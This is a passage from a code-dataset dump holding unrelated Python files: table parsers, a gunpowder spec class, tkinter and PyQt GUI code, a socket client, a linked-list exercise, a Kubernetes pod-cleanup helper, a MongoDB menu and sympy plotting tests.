1","sub_path":"DDPG.py","file_name":"DDPG.py","file_ext":"py","file_size_in_byte":13122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"543454329","text":"\"\"\"jc - JSON CLI output utility universal Parsers\"\"\"\n\n\nimport string\n\n\ndef simple_table_parse(data):\n \"\"\"\n Parse simple tables. The last column may contain data with spaces\n\n code adapted from Conor Heine at:\n https://gist.github.com/cahna/43a1a3ff4d075bcd71f9d7120037a501\n\n Parameters:\n\n data: (list) Text data to parse that has been split into lines via .splitlines().\n Item 0 must be the header row. Any spaces in header names should be\n changed to underscore '_'. You should also ensure headers are\n lowercase by using .lower().\n\n Also, ensure there are no blank lines (list items) in the data.\n\n Returns:\n\n List of Dictionaries raw structured data\n \"\"\"\n headers = [h for h in ' '.join(data[0].strip().split()).split() if h]\n raw_data = map(lambda s: s.strip().split(None, len(headers) - 1), data[1:])\n raw_output = [dict(zip(headers, r)) for r in raw_data]\n\n return raw_output\n\n\ndef sparse_table_parse(data, delim='\\u2063'):\n \"\"\"\n Parse tables with missing column data or with spaces in column data.\n\n Parameters:\n\n data: (list) Text data to parse that has been split into lines via .splitlines().\n Item 0 must be the header row. Any spaces in header names should be\n changed to underscore '_'. You should also ensure headers are\n lowercase by using .lower(). Do not change the position of header\n names as the positions are used to find the data.\n\n Also, ensure there are no blank lines (list items) in the data.\n\n delim: (string) Delimiter to use. By default 'u\\2063' (invisible separator) is used\n since this is unlikely to ever be seen in terminal output. You can\n change this for troubleshooting purposes or if there is a delimiter\n conflict with your data.\n\n Returns:\n\n List of Dictionaries raw structured data\n \"\"\"\n output = []\n header_text = data.pop(0)\n header_text = header_text + ' '\n header_list = header_text.split()\n\n # find each column index and end position\n header_search = [header_list[0]]\n for h in header_list[1:]:\n header_search.append(' ' + h + ' ')\n\n header_spec_list = []\n for i, column in enumerate(header_list[0:len(header_list) - 1]):\n header_spec = {\n 'name': column,\n 'end': header_text.find(header_search[i + 1])\n }\n\n header_spec_list.append(header_spec)\n\n # parse lines\n if data:\n for entry in data:\n output_line = {}\n\n # insert new separator since data can contain spaces\n for col in reversed(header_list):\n # find the right header_spec\n for h_spec in header_spec_list:\n if h_spec['name'] == col:\n h_end = h_spec['end']\n # check if the location contains whitespace. if not\n # then move to the left until a space is found\n while h_end > 0 and entry[h_end] not in string.whitespace:\n h_end -= 1\n\n # insert custom delimiter\n entry = entry[:h_end] + delim + entry[h_end + 1:]\n\n # create the entry list from the new custom delimiter\n entry_list = entry.split(delim, maxsplit=len(header_list) - 1)\n\n # clean up leading and trailing spaces in entry\n clean_entry_list = []\n for col in entry_list:\n clean_entry = col.strip()\n if clean_entry == '':\n clean_entry = None\n\n clean_entry_list.append(clean_entry)\n\n output_line = dict(zip(header_list, clean_entry_list))\n output.append(output_line)\n\n return output\n","sub_path":"jc/parsers/universal.py","file_name":"universal.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"109452061","text":"import fractions\nfrom gunpowder.coordinate import Coordinate\nfrom gunpowder.points import PointsKey\nfrom gunpowder.points_spec import PointsSpec\nfrom gunpowder.array import ArrayKey\nfrom gunpowder.array_spec import ArraySpec\nfrom .freezable import Freezable\n\nclass ProviderSpec(Freezable):\n '''A collection of (possibly partial) :class:`ArraySpecs` and\n :class:`PointsSpecs` describing a\n :class:`BatchProvider's` offered arrays and points.\n\n This collection mimics a dictionary. Specs can be added with::\n\n provider_spec = ProviderSpec()\n provider_spec[array_key] = ArraySpec(...)\n provider_spec[points_key] = PointsSpec(...)\n\n Here, ``array_key`` and ``points_key`` are :class:`ArrayKey` and\n :class:`PointsKey`. The specs can be queried with::\n\n array_spec = provider_spec[array_key]\n points_spec = provider_spec[points_key]\n\n Furthermore, pairs of keys/values can be iterated over using\n ``provider_spec.items()``.\n\n To access only array or points specs, use the dictionaries\n ``provider_spec.array_specs`` or ``provider_spec.points_specs``,\n respectively.\n\n Args:\n\n array_specs (``dict``, :class:`ArrayKey` -> :class:`ArraySpec`):\n\n Initial array specs.\n\n points_specs (``dict``, :class:`PointsKey` -> :class:`PointsSpec`):\n\n Initial points specs.\n\n Attributes:\n\n array_specs (``dict``, :class:`ArrayKey` -> :class:`ArraySpec`):\n\n Contains all array specs contained in this provider spec.\n\n points_specs (``dict``, :class:`PointsKey` -> :class:`PointsSpec`):\n\n Contains all points specs contained in this provider spec.\n '''\n\n def __init__(self, array_specs=None, points_specs=None):\n\n self.array_specs = {}\n self.points_specs = {}\n self.freeze()\n\n # use __setitem__ instead of copying the dicts, this ensures type tests\n # are run\n if array_specs is not None:\n for key, spec in array_specs.items():\n self[key] = spec\n if points_specs is not None:\n for key, spec in points_specs.items():\n self[key] = spec\n\n\n def __setitem__(self, key, spec):\n\n if isinstance(spec, ArraySpec):\n assert isinstance(key, ArrayKey), (\"Only a ArrayKey is \"\n \"allowed as key for a \"\n \"ArraySpec value.\")\n self.array_specs[key] = spec.copy()\n\n elif isinstance(spec, PointsSpec):\n assert isinstance(key, PointsKey), (\"Only a PointsKey is \"\n \"allowed as key for a \"\n \"PointsSpec value.\")\n self.points_specs[key] = spec.copy()\n\n else:\n raise RuntimeError(\"Only ArraySpec or PointsSpec can be set in a \"\n \"%s.\"%type(self).__name__)\n\n def __getitem__(self, key):\n\n if isinstance(key, ArrayKey):\n return self.array_specs[key]\n\n elif isinstance(key, PointsKey):\n return self.points_specs[key]\n\n else:\n raise RuntimeError(\n \"Only ArrayKey or PointsKey can be used as keys in a \"\n \"%s.\"%type(self).__name__)\n\n def __len__(self):\n\n return len(self.array_specs) + len(self.points_specs)\n\n def __contains__(self, key):\n\n if isinstance(key, ArrayKey):\n return key in self.array_specs\n\n elif isinstance(key, PointsKey):\n return key in self.points_specs\n\n else:\n raise RuntimeError(\n \"Only ArrayKey or PointsKey can be used as keys in a \"\n \"%s.\"%type(self).__name__)\n\n def __delitem__(self, key):\n\n if isinstance(key, ArrayKey):\n del self.array_specs[key]\n\n elif isinstance(key, PointsKey):\n del self.points_specs[key]\n\n else:\n raise RuntimeError(\n \"Only ArrayKey or PointsKey can be used as keys in a \"\n \"%s.\"%type(self).__name__)\n\n def items(self):\n '''Provides a generator iterating over key/value pairs.'''\n\n for (k, v) in self.array_specs.items():\n yield k, v\n for (k, v) in self.points_specs.items():\n yield k, v\n\n def get_total_roi(self):\n '''Get the union of all the ROIs.'''\n\n total_roi = None\n for specs_type in [self.array_specs, self.points_specs]:\n for (_, spec) in specs_type.items():\n if total_roi is None:\n total_roi = spec.roi\n else:\n total_roi = total_roi.union(spec.roi)\n return total_roi\n\n def get_common_roi(self):\n '''Get the intersection of all the requested ROIs.'''\n\n common_roi = None\n for specs_type in [self.array_specs, self.points_specs]:\n for (_, spec) in specs_type.items():\n if common_roi is None:\n common_roi = spec.roi\n else:\n common_roi = common_roi.intersect(spec.roi)\n\n return common_roi\n\n def get_lcm_voxel_size(self, array_keys=None):\n '''Get the least common multiple of the voxel sizes in this spec.\n\n Args:\n\n array_keys (list of :class:`ArrayKey`, optional): If given,\n consider only the given array types.\n '''\n\n if array_keys is None:\n array_keys = self.array_specs.keys()\n\n if not array_keys:\n raise RuntimeError(\"Can not compute lcm voxel size -- there are \"\n \"no array specs in this provider spec.\")\n else:\n if not array_keys:\n raise RuntimeError(\"Can not compute lcm voxel size -- list of \"\n \"given array specs is empty.\")\n\n lcm_voxel_size = None\n for key in array_keys:\n voxel_size = self.array_specs[key].voxel_size\n if lcm_voxel_size is None:\n lcm_voxel_size = voxel_size\n else:\n lcm_voxel_size = Coordinate(\n (a * b // fractions.gcd(a, b)\n for a, b in zip(lcm_voxel_size, voxel_size)))\n\n return lcm_voxel_size\n\n def __eq__(self, other):\n\n if isinstance(other, self.__class__):\n return self.__dict__ == other.__dict__\n return NotImplemented\n\n def __ne__(self, other):\n\n if isinstance(other, self.__class__):\n return not self.__eq__(other)\n return NotImplemented\n\n def __repr__(self):\n\n r = \"\\n\"\n for (key, spec) in self.items():\n r += \"\\t%s: %s\\n\"%(key, spec)\n return r\n","sub_path":"gunpowder/provider_spec.py","file_name":"provider_spec.py","file_ext":"py","file_size_in_byte":6842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"163624449","text":"# Программа клиента, запрашивающая текущее время\n\nfrom socket import *\nimport json\nimport os\n\ns = socket (AF_INET, SOCK_STREAM)\ns.connect (('localhost', 8888))\ntm = s.recv(1024)\ns.close()\ntm = tm.decode('ascii')\nprint (f'Текущее время:{tm}')\n\nmessage = {\n \"action\": \"presence\",\n# \"time\": ,\n \"user\": {\n \"account_name\": \"COdeMaverick\",\n \"status\": \"Yep, I am here!\"\n }\n}\nmessage_to_send=json.dumps(message)\n#byte_message =\nprint(type(message_to_send))","sub_path":"Python_2/Lesson_1/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"630450861","text":"import tkinter as tk\n\nclass SampleApp(tk.Tk):\n\n def __init__(self, *args, **kwargs):\n tk.Tk.__init__(self, *args, **kwargs)\n\n container = tk.Frame(self)\n container.pack(side=\"top\", fill=\"both\", expand=True)\n container.grid_rowconfigure(0, weight=1)\n container.grid_columnconfigure(0, weight=1)\n\n self.frames = {}\n\n # alternate ways to create the frames & append to frames dict: comment out one or the other\n\n for F in (StartPage, PLG):\n page_name = F.__name__\n frame = F(parent=container, controller=self)\n self.frames[page_name] = frame\n frame.grid(row=0, column=0, sticky=\"nsew\")\n\n # self.frames[\"StartPage\"] = StartPage(parent=container, controller=self) \n # self.frames[\"PLG\"] = PLG(parent=container, controller=self)\n # self.frames[\"StartPage\"].grid(row=0, column=0, sticky=\"nsew\")\n # self.frames[\"PLG\"].grid(row=0, column=0, sticky=\"nsew\")\n\n self.show_frame(\"StartPage\")\n\n # alternate version of show_frame: comment out one or the other\n\n def show_frame(self, page_name):\n for frame in self.frames.values():\n frame.grid_remove()\n frame = self.frames[page_name]\n frame.grid()\n\n # def show_frame(self, page_name):\n # frame = self.frames[page_name]\n # frame.tkraise()\n\nclass StartPage(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n\n label = tk.Label(self, text=\"start page\")\n label.pack(side=\"top\", fill=\"x\", pady=10)\n\n button1 = tk.Button(self, text=\"Go to Page One\", command=lambda: controller.show_frame(\"PLG\"))\n button1.pack() \n\n button2 = tk.Button(self, text=\"focus traversal demo only\")\n button2.pack()\n button2.focus_set()\n\n button3 = tk.Button(self, text=\"another dummy button\")\n button3.pack()\n\n lbl = tk.Label(self, text=\"tkraise messes up focus traversal\\nwhich you can see by testing the two versions of show_frame.()\\nUsing grid_remove instead of tkraise solves that,\\nwhile preventing frames from being unable to resize to fit their own contents.\")\n lbl.pack()\n\nclass PLG(tk.Frame):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n label = tk.Label(self, text=\"Enter something below; the two buttons clear what you type.\")\n label.pack(side=\"top\", fill=\"x\", pady=10)\n self.wentry = tk.Entry(self)\n self.wentry.pack(pady = 10)\n self.text = tk.Text(self)\n self.text.pack(pady = 10)\n restart_button = tk.Button(self, text=\"Restart\", command=self.restart)\n restart_button.pack()\n refresh_button = tk.Button(self, text=\"Refresh\", command=self.refresh) \n refresh_button.pack() \n\n def restart(self):\n self.refresh()\n self.controller.show_frame(\"StartPage\")\n\n def refresh(self):\n self.wentry.delete(0, \"end\")\n self.text.delete(\"1.0\", \"end\")\n # set focus to any widget except a Text widget so focus doesn't get stuck in a Text widget when page hides\n self.wentry.focus_set()\n\nif __name__ == \"__main__\":\n app = SampleApp()\n app.mainloop()","sub_path":"framerefresh.py","file_name":"framerefresh.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"333593684","text":"\"\"\"Given the head of a singly linked list, swap every two nodes and return its head.\n\nFor example, given 1 -> 2 -> 3 -> 4, return 2 -> 1 -> 4 -> 3.\n\"\"\"\n\n\nclass Node:\n def __init__(self, v, nxt=None):\n self.val = v\n self.next = nxt\n\n\ndef swapList(hd):\n if not hd:\n return hd\n\n if not hd.next:\n return hd\n\n head = hd.next\n\n def swap(pare, ndA):\n if ndA.next:\n ndB = ndA.next\n if pare:\n pare.next = ndB\n ndC = ndB.next\n ndB.next = ndA\n ndA.next = ndC\n\n curr = hd\n pare = None\n while curr:\n next_pare = curr\n next_curr = None if not curr.next else curr.next.next\n swap(pare, curr)\n curr = next_curr\n pare = next_pare\n\n return head\n\n\ndef linkedToList(hd):\n lst = []\n curr = hd\n while curr:\n lst.append(curr.val)\n curr = curr.next\n return lst\n\n\ninps = [\n (Node(1, Node(2, Node(3, Node(4, None)))), [2, 1, 4, 3]),\n (Node(1), [1]),\n (Node(1, Node(2)), [2, 1]),\n (Node(1, Node(2, Node(3))), [2, 1, 3]),\n (Node(1, Node(2, Node(3, Node(4, Node(5))))), [2, 1, 4, 3, 5]),\n (None, []),\n]\n\nfor hd, exp in inps:\n print(f\"Swapping pairs for {linkedToList(hd)} and asserting...\")\n newHd = swapList(hd)\n assert linkedToList(newHd) == exp\n","sub_path":"python/q_a_day/swap_linked_list.py","file_name":"swap_linked_list.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"599795474","text":"import os\nimport shutil\n\nfrom .Config import get_value\n\n\ndef check_and_create_directory(paths):\n for path in paths:\n if os.path.exists(path):\n shutil.rmtree(path)\n os.mkdir(path)\n\n\ndef delete_pod():\n try:\n name_space = get_value('KUBERNETES', 'NAMESPACE')\n pod_name = os.environ['HOSTNAME']\n\n print('KUBERNETES::' + name_space)\n print('HOSTNAME::' + pod_name)\n print(os.system('chmod 777 ./bin/kubectl'))\n print(os.system('kubectl --namespace=' + name_space + ' delete pod ' + pod_name))\n except Exception as ex:\n print('Failed to delete pod')\n print(ex)\n","sub_path":"util/Comm.py","file_name":"Comm.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"628113278","text":"# encoding: utf-8\n\n\"\"\"\n@version: 1.0\n@author: WangNing\n@license: GUN \n@contact: yogehaoren@gmail.com\n@site: \n@software: PyCharm\n@file: common_widget.py\n@time: 2019/3/1 19:13\n@describe: 通用自定义组件\n\"\"\"\nfrom PyQt5.QtWidgets import QLineEdit, QPushButton, QLabel, QApplication, QWidget, QVBoxLayout,\\\n QHBoxLayout, QSlider\nfrom PyQt5.QtCore import Qt, QSize, QPoint, pyqtSignal\nfrom PyQt5.QtGui import QImage, QPixmap, QFont\n\nbutton_css = \"\"\"\n QPushButton{\n color:#ffffff;\n background:#08bb06;\n border-radius:5px;\n width:60px;\n height:15px;\n font-family:microsoft yahei ui,microsoft yahei;\n font-size:12px;\n }\n QPushButton:disabled{color:#FFFFFF}\n QPushButton:pressed{background:#d4ebd4;}\n \"\"\"\nlabel_css = 'QLabel{font-family:\\\"Microsoft YaHei\\\";font-size:12px;background:transparent;color:#000000;}'\nq_css = \"\"\"\n QLineEdit { border:1px solid #ddd;border-radius:3px;padding:0px 7px;font-size:12px;width:250px;}\n \"\"\"\n\n\nclass MyQLineEdit(QLineEdit):\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.setStyleSheet(q_css)\n\n\nclass MyQLabel(QLabel):\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.setStyleSheet(label_css)\n\n\nclass MyQButton(QPushButton):\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.setStyleSheet(button_css)\n\n\nclass QTitleLabel(QLabel):\n \"\"\"\n 新建标题栏标签类\n \"\"\"\n def __init__(self, parent, function):\n super(QTitleLabel, self).__init__(parent)\n self.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n self.function = function\n self.setFixedHeight(30)\n self.setStyleSheet(\"QTitleLabel{ background-color: Gainsboro; font: 100 10pt; }\")\n\n def mouseDoubleClickEvent(self, *args, **kwargs):\n self.function()\n return super().mouseDoubleClickEvent(*args, **kwargs)\n\n\nclass QTitleButton(QPushButton):\n \"\"\"\n 新建标题栏按钮类\n \"\"\"\n def __init__(self, *args):\n super(QTitleButton, self).__init__(*args)\n # 特殊字体以不借助图片实现最小化最大化和关闭按钮\n self.setFont(QFont(\"Webdings\"))\n self.setFixedWidth(40)\n self.setStyleSheet(\"\"\"QTitleButton{\n background-color: rgba(255, 255, 255, 0);\n color: black;\n border: 0px;\n font: 100 10pt;\n }\n QTitleButton#MinMaxButton:hover{\n background-color: #D0D0D1;\n border: 0px;\n font: 100 10pt;\n }\n QTitleButton#CloseButton:hover{\n background-color: #D32424;\n color: white;\n border: 0px;\n font: 100 10pt;\n }\"\"\")\n\n\nclass QUnFrameWindow(QWidget):\n \"\"\"\n 无边框窗口类\n \"\"\"\n content_widget = None\n _move_drag = False\n _corner_drag = False\n _bottom_drag = False\n _right_drag = False\n _TitleLabel = None\n _MainLayout = None\n _CloseButton = None\n _MaximumButton = None\n _MinimumButton = None\n _right_rect = None\n _bottom_rect = None\n move_DragPosition = None\n _corner_rect = None\n\n def __init__(self):\n # 设置为顶级窗口,无边框\n super(QUnFrameWindow, self).__init__(None, Qt.FramelessWindowHint)\n # 设置边界宽度为5\n self._padding = 5\n # 安放标题栏标签\n self.init_title_label()\n # 用装饰器将设置WindowTitle名字函数共享到标题栏标签上\n self.setWindowTitle = self._setTitleText(self.setWindowTitle)\n self.setWindowTitle(\"UnFrameWindow\")\n # 设置框架布局\n self.init_layout()\n self.setMinimumWidth(250)\n # 设置widget鼠标跟踪\n self.setMouseTracking(True)\n # 设置鼠标跟踪判断默认值\n self.init_drag()\n\n def init_drag(self):\n # 设置鼠标跟踪判断扳机默认值\n self._move_drag = False\n self._corner_drag = False\n self._bottom_drag = False\n self._right_drag = False\n\n def init_title_label(self):\n # 安放标题栏标签\n self._TitleLabel = QTitleLabel(self, self.change_windows)\n # 设置标题栏标签鼠标跟踪(如不设,则标题栏内在widget上层,无法实现跟踪)\n self._TitleLabel.setMouseTracking(True)\n self._TitleLabel.setIndent(10)\n # 设置标题栏文本缩进\n self._TitleLabel.move(0, 0)\n # 标题栏安放到左上角\n\n def init_layout(self):\n # 设置框架布局\n self.content_widget = QWidget(self)\n self.content_widget.move(2, 32)\n self.content_widget.setMouseTracking(True)\n\n def _setTitleText(self, func):\n # 设置标题栏标签的装饰器函数\n def wrapper(*args):\n self._TitleLabel.setText(*args)\n return func(*args)\n return wrapper\n\n def setTitleAlignment(self, alignment):\n # 给widget定义一个setTitleAlignment函数,以实现标题栏标签的对齐方式设定\n self._TitleLabel.setAlignment(alignment | Qt.AlignVCenter)\n\n def setCloseButton(self, bool):\n # 给widget定义一个setCloseButton函数,为True时设置一个关闭按钮\n if bool:\n self._CloseButton = QTitleButton(b'\\xef\\x81\\xb2'.decode(\"utf-8\"), self)\n self._CloseButton.setObjectName(\"CloseButton\")\n # 设置按钮的ObjectName以在qss样式表内定义不同的按钮样式\n self._CloseButton.setToolTip(\"关闭窗口\")\n self._CloseButton.setMouseTracking(True)\n # 设置按钮鼠标跟踪(如不设,则按钮在widget上层,无法实现跟踪)\n self._CloseButton.setFixedHeight(self._TitleLabel.height())\n # 设置按钮高度为标题栏高度\n self._CloseButton.clicked.connect(self.close)\n # 按钮信号连接到关闭窗口的槽函数\n\n def setMinMaxButtons(self, bool):\n # 给widget定义一个setMinMaxButtons函数,为True时设置一组最小化最大化按钮\n if bool:\n self._MinimumButton = QTitleButton(b'\\xef\\x80\\xb0'.decode(\"utf-8\"), self)\n self._MinimumButton.setObjectName(\"MinMaxButton\")\n # 设置按钮的ObjectName以在qss样式表内定义不同的按钮样式\n self._MinimumButton.setToolTip(\"最小化\")\n self._MinimumButton.setMouseTracking(True)\n # 设置按钮鼠标跟踪(如不设,则按钮在widget上层,无法实现跟踪)\n self._MinimumButton.setFixedHeight(self._TitleLabel.height())\n # 设置按钮高度为标题栏高度\n self._MinimumButton.clicked.connect(self.showMinimized)\n # 按钮信号连接到最小化窗口的槽函数\n self._MaximumButton = QTitleButton(b'\\xef\\x80\\xb1'.decode(\"utf-8\"), self)\n self._MaximumButton.setObjectName(\"MinMaxButton\")\n # 设置按钮的ObjectName以在qss样式表内定义不同的按钮样式\n self._MaximumButton.setToolTip(\"最大化\")\n self._MaximumButton.setMouseTracking(True)\n # 设置按钮鼠标跟踪(如不设,则按钮在widget上层,无法实现跟踪)\n self._MaximumButton.setFixedHeight(self._TitleLabel.height())\n # 设置按钮高度为标题栏高度\n self._MaximumButton.clicked.connect(self._changeNormalButton)\n # 按钮信号连接切换到恢复窗口大小按钮函数\n\n def change_windows(self):\n if self._MaximumButton.toolTip() == \"最大化\":\n self._changeNormalButton()\n else:\n self._changeMaxButton()\n\n def _changeNormalButton(self):\n # 切换到恢复窗口大小按钮\n try:\n self.showMaximized()\n # 先实现窗口最大化\n self._MaximumButton.setText(b'\\xef\\x80\\xb2'.decode(\"utf-8\"))\n # 更改按钮文本\n self._MaximumButton.setToolTip(\"恢复\")\n # 更改按钮提示\n self._MaximumButton.disconnect()\n # 断开原本的信号槽连接\n self._MaximumButton.clicked.connect(self._changeMaxButton)\n # 重新连接信号和槽\n except:\n pass\n\n def _changeMaxButton(self):\n # 切换到最大化按钮\n try:\n self.showNormal()\n self._MaximumButton.setText(b'\\xef\\x80\\xb1'.decode(\"utf-8\"))\n self._MaximumButton.setToolTip(\"最大化\")\n self._MaximumButton.disconnect()\n self._MaximumButton.clicked.connect(self._changeNormalButton)\n except:\n pass\n\n def resizeEvent(self, QResizeEvent):\n # 自定义窗口调整大小事件\n self._TitleLabel.setFixedWidth(self.width())\n self.content_widget.setFixedWidth(self.width()-4)\n self.content_widget.setFixedHeight(self.height()-35)\n # 将标题标签始终设为窗口宽度\n # 分别移动三个按钮到正确的位置\n try:\n self._CloseButton.move(self.width() - self._CloseButton.width(), 0)\n except:\n pass\n try:\n self._MinimumButton.move(self.width() - (self._CloseButton.width() + 1) * 3 + 1, 0)\n except:\n pass\n try:\n self._MaximumButton.move(self.width() - (self._CloseButton.width() + 1) * 2 + 1, 0)\n except:\n pass\n # 重新调整边界范围以备实现鼠标拖放缩放窗口大小,采用三个列表生成式生成三个列表\n self._right_rect = [QPoint(x, y) for x in range(self.width() - self._padding, self.width() + 1)\n for y in range(1, self.height() - self._padding)]\n self._bottom_rect = [QPoint(x, y) for x in range(1, self.width() - self._padding)\n for y in range(self.height() - self._padding, self.height() + 1)]\n self._corner_rect = [QPoint(x, y) for x in range(self.width() - self._padding, self.width() + 1)\n for y in range(self.height() - self._padding, self.height() + 1)]\n\n def mousePressEvent(self, event):\n # 重写鼠标点击的事件\n if (event.button() == Qt.LeftButton) and (event.pos() in self._corner_rect):\n # 鼠标左键点击右下角边界区域\n self._corner_drag = True\n event.accept()\n elif (event.button() == Qt.LeftButton) and (event.pos() in self._right_rect):\n # 鼠标左键点击右侧边界区域\n self._right_drag = True\n event.accept()\n elif (event.button() == Qt.LeftButton) and (event.pos() in self._bottom_rect):\n # 鼠标左键点击下侧边界区域\n self._bottom_drag = True\n event.accept()\n elif (event.button() == Qt.LeftButton) and (event.y() < self._TitleLabel.height()):\n # 鼠标左键点击标题栏区域\n self._move_drag = True\n self.move_DragPosition = event.globalPos() - self.pos()\n event.accept()\n\n def mouseMoveEvent(self, QMouseEvent):\n # 判断鼠标位置切换鼠标手势\n if QMouseEvent.pos() in self._corner_rect:\n self.setCursor(Qt.SizeFDiagCursor)\n elif QMouseEvent.pos() in self._bottom_rect:\n self.setCursor(Qt.SizeVerCursor)\n elif QMouseEvent.pos() in self._right_rect:\n self.setCursor(Qt.SizeHorCursor)\n else:\n self.setCursor(Qt.ArrowCursor)\n # 当鼠标左键点击不放及满足点击区域的要求后,分别实现不同的窗口调整\n # 没有定义左方和上方相关的5个方向,主要是因为实现起来不难,但是效果很差,拖放的时候窗口闪烁,再研究研究是否有更好的实现\n if Qt.LeftButton and self._right_drag:\n # 右侧调整窗口宽度\n self.resize(QMouseEvent.pos().x(), self.height())\n QMouseEvent.accept()\n elif Qt.LeftButton and self._bottom_drag:\n # 下侧调整窗口高度\n self.resize(self.width(), QMouseEvent.pos().y())\n QMouseEvent.accept()\n elif Qt.LeftButton and self._corner_drag:\n # 右下角同时调整高度和宽度\n self.resize(QMouseEvent.pos().x(), QMouseEvent.pos().y())\n QMouseEvent.accept()\n elif Qt.LeftButton and self._move_drag:\n # 标题栏拖放窗口位置\n self.move(QMouseEvent.globalPos() - self.move_DragPosition)\n QMouseEvent.accept()\n\n def mouseReleaseEvent(self, QMouseEvent):\n # 鼠标释放后,各扳机复位\n self._move_drag = False\n self._corner_drag = False\n self._bottom_drag = False\n self._right_drag = False\n\n\nclass VideoSlider(QSlider):\n\n set_position_value = pyqtSignal(int)\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.setFocusPolicy(Qt.NoFocus)\n self.setMouseTracking(True)\n\n self.setStyleSheet(\" \\\n QSlider::add-page:Horizontal\\\n { \\\n background-color: rgb(87, 97, 106);\\\n height:4px;\\\n }\\\n QSlider::sub-page:Horizontal \\\n {\\\n background-color:qlineargradient(spread:pad, x1:0, y1:0, x2:1, y2:0, stop:0 rgba(231,80,229, 255), stop:1 rgba(7,208,255, 255));\\\n height:4px;\\\n }\\\n QSlider::groove:Horizontal \\\n {\\\n background:transparent;\\\n height:6px;\\\n }\\\n QSlider::handle:Horizontal \\\n {\\\n height: 30px;\\\n width:8px;\\\n border-image: url(:/images/ic_music_thumb.png);\\\n margin: -8 0px; \\\n }\\\n \")\n\n def mousePressEvent(self, QMouseEvent):\n if QMouseEvent.button() == Qt.LeftButton:\n if self.orientation() == Qt.Vertical:\n self.set_position_value.emit(self.minimum() + ((self.maximum() - self.minimum()) * (self.height() - QMouseEvent.y())) / self.height())\n else:\n self.set_position_value.emit(self.minimum() + ((self.maximum() - self.minimum()) * QMouseEvent.x()) / self.width())\n return super().mousePressEvent(QMouseEvent)\n\n def keyPressEvent(self, *args, **kwargs):\n return super().keyPressEvent(*args, **kwargs)\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"other_widget/common_widget.py","file_name":"common_widget.py","file_ext":"py","file_size_in_byte":15122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"186587542","text":"from mongodb.livro import Livro\nfrom mongodb.conexao import MongoConnect\n\n\n\ndef novo_livro():\n lista = []\n\n condicao = True\n\n while condicao:\n livro_titulo = str(input(\"Informe o titulo do livro: \"))\n livro_autor = str(input(\"Informe o autor do livro: \"))\n livro_publicacao = int(input(\"Informe o ano de publicacao: \"))\n\n novo_livro = Livro(livro_titulo, livro_autor, livro_publicacao)\n\n lista.append(novo_livro)\n\n resposta = str(input(\"Caso deseje inserir um novo livro, digite: 's', caso não deseje digite: 'n' >> \"))\n if resposta == 'n':\n condicao = False\n\n for livro in lista:\n livro.save()\n\n\n# novo_livro()\n\n\n\ndef mostra():\n conexao = MongoConnect()\n conexao.find()\n\n\n\n\ndef menu():\n op = None\n while op != 'l' or 'v' or 's':\n op = str(\n input(\"Se deseja cadastrar um novo livro digite: 'l', se deseja visualizar os livro ja cadastrados \"\n \"digite 'v', ou 's' para sair: \"))\n if op == 'l':\n novo_livro()\n elif op == 'v':\n mostra()\n elif op == 's':\n break\n else:\n print(\"Escolha uma das opcoes validas\")\n\nmenu()","sub_path":"mongodb/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"368304727","text":"from sympy import (\n symbols,\n cos,\n sin,\n log,\n Eq,\n I,\n Abs,\n exp,\n pi,\n gamma,\n Matrix,\n Tuple,\n sqrt,\n Plane,\n)\nfrom sympy.geometry import (\n Plane,\n Polygon,\n Circle,\n Ellipse,\n Line,\n Segment,\n Ray,\n Line3D,\n Curve,\n Point2D,\n Point3D,\n Line3D,\n Segment3D,\n Ray3D,\n)\nfrom sympy.vector import CoordSys3D\nfrom pytest import raises\nfrom spb.plot_data import _build_series\nfrom spb.series import (\n LineOver1DRangeSeries,\n Parametric2DLineSeries,\n Parametric3DLineSeries,\n ParametricSurfaceSeries,\n SurfaceOver2DRangeSeries,\n InteractiveSeries,\n ImplicitSeries,\n Vector2DSeries,\n Vector3DSeries,\n ComplexSeries,\n ComplexInteractiveSeries,\n SliceVector3DSeries,\n GeometrySeries,\n PlaneSeries,\n PlaneInteractiveSeries,\n)\n\nimport numpy as np\n\n\ndef test_build_series():\n x, y, u, v = symbols(\"x, y, u, v\")\n\n # test automatic algoritm\n\n s = _build_series(cos(x), (x, -5, 5))\n assert isinstance(s, LineOver1DRangeSeries)\n\n s = _build_series((cos(x), sin(x)), (x, -5, 5))\n assert isinstance(s, Parametric2DLineSeries)\n\n s = _build_series(cos(x), sin(x), (x, -5, 5))\n assert isinstance(s, Parametric2DLineSeries)\n\n s = _build_series(cos(x), sin(x), x, (x, -5, 5))\n assert isinstance(s, Parametric3DLineSeries)\n\n s = _build_series(cos(x + y), (x, -5, 5))\n assert isinstance(s, SurfaceOver2DRangeSeries)\n\n s = _build_series(cos(x + y), sin(x + y), x, (x, -5, 5))\n assert isinstance(s, ParametricSurfaceSeries)\n\n s = _build_series((cos(x + y), sin(x + y), x), (x, -5, 5), (y, -2, 2))\n assert isinstance(s, ParametricSurfaceSeries)\n\n s = _build_series(u * cos(x), 